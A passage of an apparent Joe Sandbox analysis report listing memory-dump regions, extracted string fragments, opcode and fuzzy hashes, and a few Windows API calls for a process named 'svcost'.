                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 4f89dbed71b7a2ad2c52cbdb18542e6ed50ed43828e1c3441bc85a2db2260f7e
                                                                                            • Instruction ID: 58bfda7d15e2d0a8060f9c4dd67e24447f1395e9701f3735970ee379cf54824a
                                                                                            • Opcode Fuzzy Hash: 4f89dbed71b7a2ad2c52cbdb18542e6ed50ed43828e1c3441bc85a2db2260f7e
                                                                                            • Instruction Fuzzy Hash: 48221D74A00218DFDB24DF64C894BADB7B2FF48704F1495AAE509AB3A5DB70AD81CF50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: `{C$`{C$cV
                                                                                            • API String ID: 0-4145016544
                                                                                            • Opcode ID: fac0370aa7a3d5d32422fea588337a56ad76379bf6db95e606798c2cb5cb93bf
                                                                                            • Instruction ID: 09cd066950833ed1e9e50493d1312e1ec063d210db4949972fe4fe370bc6e92b
                                                                                            • Opcode Fuzzy Hash: fac0370aa7a3d5d32422fea588337a56ad76379bf6db95e606798c2cb5cb93bf
                                                                                            • Instruction Fuzzy Hash: A152A574A046288FCB65DF28CD84B9AB7B2FB89301F5081E9D90DA7355DB30AE81CF55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 4cd2d5aba49d7088af42512d1127a0d5a97951ad285c9bbedf6fe729a7038847
                                                                                            • Instruction ID: f0b4baabcdc1b0d595312a9c61310886b22fb1f839f7c8c1b516350a51fe6e28
                                                                                            • Opcode Fuzzy Hash: 4cd2d5aba49d7088af42512d1127a0d5a97951ad285c9bbedf6fe729a7038847
                                                                                            • Instruction Fuzzy Hash: 31611E71D05A588FDB19CF6BCC5429ABBF3AFCA305F08C0AAC448AB265DB744985CF51
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bd0bff349a282f87cc6f9820598e38d12d6cd8299edf6267fcb4f39176c36616
                                                                                            • Instruction ID: 587c8cff0cb9bfa264af416fcff920781bde55ac1f13d31e5b1d1b1dd2b1ebd9
                                                                                            • Opcode Fuzzy Hash: bd0bff349a282f87cc6f9820598e38d12d6cd8299edf6267fcb4f39176c36616
                                                                                            • Instruction Fuzzy Hash: 19B1F374E45218CFDB18DFAAE884BADBBF2BF89304F11907AD419AB255DB305985CF00
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb47a3536d27b447daaaae27aa92968f18b98a8b9ef0a11abe6658e9b6a99243
                                                                                            • Instruction ID: 88d77047f0d0293ad730fa9b1042c16bf44405d2d63942b7f9eb29c02b9c2e32
                                                                                            • Opcode Fuzzy Hash: fb47a3536d27b447daaaae27aa92968f18b98a8b9ef0a11abe6658e9b6a99243
                                                                                            • Instruction Fuzzy Hash: 81912770E89218CFEB28CF69D954BADBBF2BB49314F1090BAD019E7251D7715984CF82
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 857881b057ebe87e9d42e9965e44194c243af0cc4e6adc55bfea763b4e06e420
                                                                                            • Instruction ID: 5ad20ae3e8297858cbef8882c9b3b23b08f972f8d13b617d6b9026aee3c8a030
                                                                                            • Opcode Fuzzy Hash: 857881b057ebe87e9d42e9965e44194c243af0cc4e6adc55bfea763b4e06e420
                                                                                            • Instruction Fuzzy Hash: CA712FB5E046058FD708EFAAE851A9EBBF2BF96300F04C57AD014AB274DF705946CB50
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8db98ea06f5c4ab6668a8f428d4029e853eb55adbdb9632e9159b515ce214b45
                                                                                            • Instruction ID: e3508265df50fdebab352fd33b4f5a2809f1b751ac486408bcd26d7cb4d45ced
                                                                                            • Opcode Fuzzy Hash: 8db98ea06f5c4ab6668a8f428d4029e853eb55adbdb9632e9159b515ce214b45
                                                                                            • Instruction Fuzzy Hash: EA711DB5E006058FD708EFAAE841A9EBBF2BBD9300F04C57AD414AB278DF705946CB50

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8`p$Op$Op$Op$Op
                                                                                            • API String ID: 0-1327710682
                                                                                            • Opcode ID: 27fbf7831b841d78e27a852d76cd2b37a0fa3c996080def570cedb053f1f4d49
                                                                                            • Instruction ID: f4010e8a90639bc26137791802dc12afb3815137cc7c0e21a1d12676502a8d43
                                                                                            • Opcode Fuzzy Hash: 27fbf7831b841d78e27a852d76cd2b37a0fa3c996080def570cedb053f1f4d49
                                                                                            • Instruction Fuzzy Hash: F3229D35A00214DFDB14DFA4C8A4A6DBBB6EF88314F148169E905AB7A5CB76EC41CB90

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$(!p$(!p$(!p$(!p
                                                                                            • API String ID: 0-3955841951
                                                                                            • Opcode ID: 5c7852c407a779555126763907037b85b774c9c6f2af4811414a57ba3c2d41ae
                                                                                            • Instruction ID: 57ed7ca989744004d435fe1d3113ff8cc2acaae120bb8ff46bd18d921a451a01
                                                                                            • Opcode Fuzzy Hash: 5c7852c407a779555126763907037b85b774c9c6f2af4811414a57ba3c2d41ae
                                                                                            • Instruction Fuzzy Hash: E9C146323143154FDB19DF68D850A7EBBA6EF84351B19817AFA09CB3A6CB34DC128791
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p$4$8kp$fp
                                                                                            • API String ID: 0-1917797414
                                                                                            • Opcode ID: 08a6a7383a57d3df825be2eab8959a4248fc0993a49712d2cf66d18f1cbe3290
                                                                                            • Instruction ID: 8e3a95dbd76772f1aad1dce9b23b1c44fc27f357b46701174408984fd304077a
                                                                                            • Opcode Fuzzy Hash: 08a6a7383a57d3df825be2eab8959a4248fc0993a49712d2cf66d18f1cbe3290
                                                                                            • Instruction Fuzzy Hash: 14221874A00218DFDB14CFA4C894BADB7B6FF48704F1595AAE509AB3A5DB70AC81CF50

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ^$^$cV
                                                                                            • API String ID: 0-549033992
                                                                                            • Opcode ID: d40fbafdd0d8a88012ee8410dae744c44d25c36245b1efb171edbaa11b076958
                                                                                            • Instruction ID: 7f90efe7f26bfc18bff28d8cbb40bed04578878293e1d9d1f024dbfa15f2bdd0
                                                                                            • Opcode Fuzzy Hash: d40fbafdd0d8a88012ee8410dae744c44d25c36245b1efb171edbaa11b076958
                                                                                            • Instruction Fuzzy Hash: 1741D07494126CCFDB24EFA0C888BEDBBB2BB49301F5051AAC409BB394DB755A85CF54

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: <`C$T$cV
                                                                                            • API String ID: 0-2808027785
                                                                                            • Opcode ID: 21d237c85b146a83656b9cf2fe726568474a316283c37f19a4419ec3d471bf03
                                                                                            • Instruction ID: d4868f75d46ea8f03019d3a586a99ff29e59c753bc3779176769994f425c6872
                                                                                            • Opcode Fuzzy Hash: 21d237c85b146a83656b9cf2fe726568474a316283c37f19a4419ec3d471bf03
                                                                                            • Instruction Fuzzy Hash: 4E411574A08229CFCB64DF58C998AEABBF1FF49301F5040EAE549AB391D7745E808F05

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$/$cV
                                                                                            • API String ID: 0-3499279629
                                                                                            • Opcode ID: 2e2d241dc0bcbfe32ca3c851a5c3e36d2097071d0b8b9152c42e42cc0231aae1
                                                                                            • Instruction ID: a4348cbc090c3601c2307f22b8e1d2a94dcf51a1985da6405ceb18dd21265e1e
                                                                                            • Opcode Fuzzy Hash: 2e2d241dc0bcbfe32ca3c851a5c3e36d2097071d0b8b9152c42e42cc0231aae1
                                                                                            • Instruction Fuzzy Hash: 2E21E2349002AADBCF21DF98C844BDDB7B6FB59314F0085AAE909B7650C7316E85CF80

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$"$(
                                                                                            • API String ID: 0-2570854509
                                                                                            • Opcode ID: f14a3c411884c43965e8418505d0dab072afd223ea025b4cf3853cc7bdab2082
                                                                                            • Instruction ID: 408cc3a9fe2a376128c6be079ffd19cc01ac8686a6c387ec1be52f4ecee55f93
                                                                                            • Opcode Fuzzy Hash: f14a3c411884c43965e8418505d0dab072afd223ea025b4cf3853cc7bdab2082
                                                                                            • Instruction Fuzzy Hash: 53219FB4A012288FDB64DF28D968BDAB7F1FB4A301F4051EAD50AA7260DB355E81CF45

                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$_$C
                                                                                            • API String ID: 0-505629384
                                                                                            • Opcode ID: 0cafc63b546c5990e224b051b7a90a72d704b60002798503f5f66e2ef194a87b
                                                                                            • Instruction ID: 01a3c68a73837ebecb30a1860a5d7a769db1bc2d585447e8c6639b62b9f372ee
                                                                                            • Opcode Fuzzy Hash: 0cafc63b546c5990e224b051b7a90a72d704b60002798503f5f66e2ef194a87b
                                                                                            • Instruction Fuzzy Hash: A7E0D87184624C9FD701DBB49920BAF7BA4DB06305F1001FACC45D7263DB350A188F92
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$d
                                                                                            • API String ID: 0-1322973597
                                                                                            • Opcode ID: 0f05660029655b34202dbc1c63f64a1c200665ee12f12762bd8888fdf121a0be
                                                                                            • Instruction ID: 1bdccb231085b2081562b6960f3d836546b6e6acb0b1fcec339b5447bc2f4922
                                                                                            • Opcode Fuzzy Hash: 0f05660029655b34202dbc1c63f64a1c200665ee12f12762bd8888fdf121a0be
                                                                                            • Instruction Fuzzy Hash: E1D1673520060A8FCB24CF29C584A6AB7F2FF89350B15C979D55A9B361DB30FC52CB94
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: |*6$cV
                                                                                            • API String ID: 0-2602844131
                                                                                            • Opcode ID: 1c1a7f4ea0ec7646fb05ac1416984dd4e532f6029d3340f177216cf1ae8391d3
                                                                                            • Instruction ID: 8e6f25b13d9357ea27b6e441702b3780bdd9dcf1fd1a61ff97def0a992f395b8
                                                                                            • Opcode Fuzzy Hash: 1c1a7f4ea0ec7646fb05ac1416984dd4e532f6029d3340f177216cf1ae8391d3
                                                                                            • Instruction Fuzzy Hash: 3DB13B74E04318CFDB64DFA4D854BADBBF2FB49310F5080AAE419AB695CB345986CF05
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p$H!p
                                                                                            • API String ID: 0-1960402415
                                                                                            • Opcode ID: b260df3bf43351d10a426676ec823f73b3d6a62024561d722eff2e9d39590640
                                                                                            • Instruction ID: 552df762e8dbf40f10d0a89338a777493147ade8259ea216fb4751477612a3f5
                                                                                            • Opcode Fuzzy Hash: b260df3bf43351d10a426676ec823f73b3d6a62024561d722eff2e9d39590640
                                                                                            • Instruction Fuzzy Hash: 3B51BD313002048FDB28AB74C86462E77A3EF99315B64857DE506DB7A5CF35EC06CBA5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p$cV
                                                                                            • API String ID: 0-1023711961
                                                                                            • Opcode ID: 2b2f28b457a48dcb13833037fef361130c943c5a859088c8cce0131a2baf6876
                                                                                            • Instruction ID: 451325ba8f9c26a3f3a8f99c5c66f32249d5ef1fe1f1b7e5f97d44d0284dfb8f
                                                                                            • Opcode Fuzzy Hash: 2b2f28b457a48dcb13833037fef361130c943c5a859088c8cce0131a2baf6876
                                                                                            • Instruction Fuzzy Hash: FA710674E04208DFDB04EFA8D99469EBBF2FB99300F20802AE515BB399DB745A45CF54
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p$cV
                                                                                            • API String ID: 0-1023711961
                                                                                            • Opcode ID: 5c3e8fc0996849a30ea88e47d442a2d26ea78a70db173e98b4dc018f0c50b6e4
                                                                                            • Instruction ID: 93352b8cf0c83506e00dd4c819027a7d218a63e35feb1f13ce7bb0289ab133f3
                                                                                            • Opcode Fuzzy Hash: 5c3e8fc0996849a30ea88e47d442a2d26ea78a70db173e98b4dc018f0c50b6e4
                                                                                            • Instruction Fuzzy Hash: 0571E674E04208DFDB04EFA8D95469EBBF2FB99300F208029E515BB398DB745A45CF55
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0C$"
                                                                                            • API String ID: 0-2711401315
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5$cV
                                                                                            • API String ID: 0-365018511
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: _$_
                                                                                            • API String ID: 0-2459770204
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520103714.0000000005400000.00000040.00000800.00020000.00000000.sdmp, Offset: 05400000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_5400000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$cV
                                                                                            • API String ID: 0-606709522
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 044BDDE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.520042191.00000000044B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 044B0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_44b0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515813150.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2120000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515813150.0000000002120000.00000040.00000800.00020000.00000000.sdmp, Offset: 02120000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2120000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 006142BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515571016.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_610000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515108710.00000000002F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002F0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2f0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p
                                                                                            • API String ID: 0-2763268518
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515889967.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_23a0000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p!p
                                                                                            • API String ID: 0-1147775804
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 872e7bb43e5932875f790759e5cc8016cba0e336e00f9f826f7c65880f895d06
                                                                                            • Instruction ID: 8c380ed6b81901a32bae914ba0ade20be4fd77758f37b75441f02d379ef1d46e
                                                                                            • Opcode Fuzzy Hash: 872e7bb43e5932875f790759e5cc8016cba0e336e00f9f826f7c65880f895d06
                                                                                            • Instruction Fuzzy Hash: D8514574905218CFDB10CFA8D954B9CBBF6FB4A304F2080AAD409AB790D7305989CF00
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: b1616484564cc5842524e5be84127adb3e143d21e7e16953e75e6a6d718443ce
                                                                                            • Instruction ID: 959be25409ba088030631ccdd0962efc497a09cc95f0ab4efee0523356659fa3
                                                                                            • Opcode Fuzzy Hash: b1616484564cc5842524e5be84127adb3e143d21e7e16953e75e6a6d718443ce
                                                                                            • Instruction Fuzzy Hash: 07510478A11218CFDF50DFA8D844B9DB7F6FB89310F10406AD409AB795DB349985CF60
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_690000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: cV
                                                                                            • API String ID: 0-686381113
                                                                                            • Opcode ID: 669964c48f9441633645d3e0143b59a916c6e1b926b2b5aebaa31354bb0f9f80
                                                                                            • Instruction ID: 79c408acb050e0a3fb077e295bcf637fb6eab831d41b6919d8b1af0e102db93a
                                                                                            • Opcode Fuzzy Hash: 669964c48f9441633645d3e0143b59a916c6e1b926b2b5aebaa31354bb0f9f80
                                                                                            • Instruction Fuzzy Hash: 9C4113B0E04718DFCB05DFA8D850ADDBBB6FF9A300F10822AE415B7660DB71A985CB40
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515790903.0000000002110000.00000040.00000800.00020000.00000000.sdmp, Offset: 02110000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_8_2_2110000_svcost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: oOI
                                                                                            • API String ID: 0-15478488
                                                                                            • Opcode ID: 0db8b85c801a836f99500ebb45321b63ca3aaf21059db51e3a08552d3a7330d9
                                                                                            • Instruction ID: 70c9ef68e85748d123f92ed016f4f488f084a49c1a366a0d87987f3051da19ec
                                                                                            • Opcode Fuzzy Hash: 0db8b85c801a836f99500ebb45321b63ca3aaf21059db51e3a08552d3a7330d9
                                                                                            • Instruction Fuzzy Hash: 8C51C3B4E41208DFDB18DFB9D594AADBBB2BF89304F20912AE415AB360DB359941CF50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000008.00000002.515632838.0000000000690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
